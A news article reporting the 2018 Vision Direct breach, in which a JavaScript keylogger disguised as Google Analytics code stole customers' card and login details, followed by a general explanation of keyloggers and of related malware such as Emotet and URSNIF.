By Mark Fairlie.

Any Vision Direct customers who logged into to their account between 12.11am on 3rd November and 12.52pm on 8th November is at risk of having had their name, address, email address, password, telephone number, and debit/credit card details (including the three digits on the signature strip) stolen, the company has revealed.

According to the Times, although the company’s customer database had not been affected, the cybercriminals had stolen information from the forms that the customers fill out online. 16,300 have been affected by the breach, of whom 6,000 had their bank details taken.

Online computing site, the Register, claims to have received a report from one of its readers that they had received multiple notifications from their bank about repeated £250 transactions to unknown companies.

As reported on BBC News, a spokesperson said that the company will “compensate any customers who have suffered a financial loss as a result of this breach”.


Vision Direct’s website, as reported in TechCrunch, stated that

“(t)his data was compromised when entering data on the website and not from the Vision Direct database…The breach has been resolved and our website is working normally.”

The company revealed that although Visa, Mastercard, and Maestro card owners were affected, PayPal users were not, although parts of their data may have been stolen too.

The same site reports that the data was stolen via a JavaScript keylogger secretly installed on the company’s sites. The same keylogger was installed on the company’s websites in Ireland, Netherlands, France, Spain, Italy and Belgium (source: Willem de Groot, Twitter).

The bug poses as Google Analytics code – Google Analytics allows Vision Direct and other companies to monitor how people find their site and what they do when they arrive there.


Vision Direct customers’ details stolen online

The bug which affected the Vision Direct sites was a piece of malware called a keylogger.

A keylogger is a program which records the keys a person presses on their keyboards when they’re using their computer. Although keyloggers are often used by employers to monitor computer usage by staff, many cybercriminals use them to steal passwords and other confidential information, according to Secure List.

According to website search company PublicWWW and as reported by ArsTechnica, more than 2,000 websites run on the popular WordPress platform are infected with keylogging malware. Another investigation, this time carried out by website security firm Sucuri, found keylogging malware on another 5,500 WordPress sites.

Cybercriminals have begun to target financial institutions with keylogging software too, according to Investment News. As these institutions have begun to take malware and hacker threats seriously, “that a higher level of security is inspiring more sophisticated attacks”, writes Ryan W. Neal.

The particular types of keyloggers found on financial company computer systems are called Emotet and URSNIF which

“infect a computer through a Microsoft Office document, can evade detection, and hijack transfer payments”.

It’s not just cybercriminals using keyloggers to achieve a certain outcome. Keyloggers are being deployed on computers for various different reasons including monitoring children’s use of the internet. The KidLogger keylogger, available for $89 a year, saves kids’ keystrokes into a text file for easy retrieval so that a parent can assure themselves about the websites their children are visiting and the people they are interacting with.